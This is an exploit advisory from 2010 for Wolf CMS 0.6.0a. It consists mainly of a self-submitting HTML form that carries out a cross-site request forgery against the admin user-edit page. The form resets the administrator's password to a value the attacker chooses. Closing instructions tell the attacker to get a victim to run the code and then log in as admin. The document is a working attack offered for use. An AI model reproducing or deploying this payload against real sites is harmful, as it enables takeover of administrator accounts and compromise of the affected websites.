wolfcms-xsrf.txt
Posted on 05 April 2010
Exploit Title: Wolf CMS Change Admin Password CSRF Date: 2010-04-03 Author: Stefan M. Software Link: http://www.wolfcms.org/ Version: 0.6.0a Email: stefo@cia.com GreeTz to: d14l(a.k.a Teo) & baltazar --- START OF HTML CODE --- <form action="http://[website]/admin/?/user/edit/1" method="post"> <input class="textbox" id="user_name" maxlength="100" name="user[name]" size="100" type="text" value="Administrator" /> <input class="textbox" id="user_email" maxlength="255" name="user[email]" size="255" type="text" value="[your email]" /> <input class="textbox" id="user_username" maxlength="40" name="user[username]" size="40" type="text" value="admin" disabled="disabled" /> <input class="textbox" id="user_password" maxlength="40" name="user[password]" size="40" type="password" value="[enter desired password]" /> <input class="textbox" id="user_confirm" maxlength="40" name="user[confirm]" size="40" type="password" value="[repeat the password]" /> <input checked="checked" id="user_permission-administrator" name="user_permission[administrator]" type="checkbox" value="1" /> <input id="user_permission-developer" name="user_permission[developer]" type="checkbox" value="2" /> <input id="user_permission-editor" name="user_permission[editor]" type="checkbox" value="3" /> <select class="select" id="user_language" name="user[language]"> <option value="bn">Bengali</option> <option value="zh">Chinese</option> <option value="hr">Croatian</option> <option value="cs">Czech</option> <option value="da">Danish</option> <option value="nl">Dutch</option> <option value="en" selected="selected">English</option> <option value="fr">French</option> <option value="de">German</option> <option value="hu">Hungarian</option> <option value="id">Indonesian</option> <option value="it">Italian</option> <option value="ja">Japanese</option> <option value="no">Norwegian</option> <option value="pl">Polish</option> <option value="pt">Portuguese</option> <option value="ru">Russian</option> <option value="es">Spanish</option> <option value="sv">Swedish</option> </select> <script>document.forms[0].submit()</script> </form> --- END OF HTML CODE --- You dont have to change username of the administrator,since this code will change the password of the user with the ID 1. After the victim executes this code,the password will be changed to your desired password. Later,just visit: http://[website]/admin/?/login and type username: admin password: [desired password] # If you have any questions whatsoever,feel free to contact me.
